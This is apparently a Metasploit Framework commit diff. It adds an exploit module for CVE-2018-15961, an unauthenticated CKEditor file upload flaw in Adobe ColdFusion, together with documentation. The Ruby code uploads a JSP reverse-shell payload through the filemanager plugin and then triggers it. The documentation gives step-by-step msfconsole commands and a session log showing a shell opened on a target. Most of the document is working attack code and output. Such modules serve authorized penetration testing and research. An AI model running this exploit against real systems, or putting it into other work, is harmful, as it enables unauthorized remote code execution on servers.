Land #11206, add coldfusion ckeditor file upload
commit
2f939481e7
|
@ -0,0 +1,48 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
|
||||||
|
(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
|
||||||
|
ColdFusion 2018 (July 12 release) allows unauthenticated remote
|
||||||
|
attackers to upload and execute JSP files through the filemanager
|
||||||
|
plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
ColdFusion 11 (Update 14 and earlier),
|
||||||
|
ColdFusion 2016 (Update 6 and earlier), and
|
||||||
|
[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. `./msfconsole -q`
|
||||||
|
2. `use exploit/multi/http/coldfusion_ckeditor_file_upload`
|
||||||
|
3. `set rhosts <rhost>`
|
||||||
|
4. `set lhost <lhost>`
|
||||||
|
5. `exploit`
|
||||||
|
6. Get a shell
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Tested on Coldfusion 2018 v2018.0.0.310739
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
|
||||||
|
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
|
||||||
|
rhosts => 172.22.222.142
|
||||||
|
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136
|
||||||
|
lhost => 172.22.222.136
|
||||||
|
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 172.22.222.136:4444
|
||||||
|
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
|
||||||
|
[+] Upload succeeded! Executing payload...
|
||||||
|
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600
|
||||||
|
|
||||||
|
whoami
|
||||||
|
cfuser
|
||||||
|
uname -a
|
||||||
|
Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||||
|
exit
|
||||||
|
[*] 172.22.222.142 - Command shell session 1 closed.
|
||||||
|
msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >
|
||||||
|
```
|
|
@ -0,0 +1,93 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',
|
||||||
|
'Description' => %q{
|
||||||
|
A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
|
||||||
|
(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
|
||||||
|
ColdFusion 2018 (July 12 release) allows unauthenticated remote
|
||||||
|
attackers to upload and execute JSP files through the filemanager
|
||||||
|
plugin.
|
||||||
|
Tested on Adobe ColdFusion 2018.0.0.310739.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Pete Freitag de Foundeo', # Vulnerability discovery
|
||||||
|
'Vahagn vah_13 Vardanian', # First public PoC
|
||||||
|
'Qazeer' # Metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2018-15961' ],
|
||||||
|
[ 'BID', '105314' ],
|
||||||
|
[ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'Platform' => %w{ linux win },
|
||||||
|
'Arch' => ARCH_JAVA,
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Java Universal',
|
||||||
|
{
|
||||||
|
'Arch' => ARCH_JAVA,
|
||||||
|
'Platform' => %w{ linux win },
|
||||||
|
'Payload' => { 'DisableNops' => true },
|
||||||
|
'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
|
||||||
|
}
|
||||||
|
]
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => { 'RPORT' => 8500 },
|
||||||
|
'DisclosureDate' => 'Sep 11 2018'
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options [
|
||||||
|
OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
filename = rand_text_alpha_upper(1..10) + '.jsp'
|
||||||
|
|
||||||
|
print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")
|
||||||
|
|
||||||
|
mime = Rex::MIME::Message.new
|
||||||
|
mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
|
||||||
|
mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')
|
||||||
|
|
||||||
|
post_str = mime.to_s
|
||||||
|
post_str.strip!
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
|
||||||
|
'version' => '1.1',
|
||||||
|
'method' => 'POST',
|
||||||
|
'ctype' => 'multipart/form-data; boundary=' + mime.bound,
|
||||||
|
'data' => post_str,
|
||||||
|
})
|
||||||
|
|
||||||
|
unless res && res.code == 200
|
||||||
|
fail_with Failure::Unknown, 'Upload Failed...'
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good('Upload succeeded! Executing payload...')
|
||||||
|
|
||||||
|
send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
|
||||||
|
'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
|
||||||
|
'method' => 'GET'
|
||||||
|
}, 5)
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue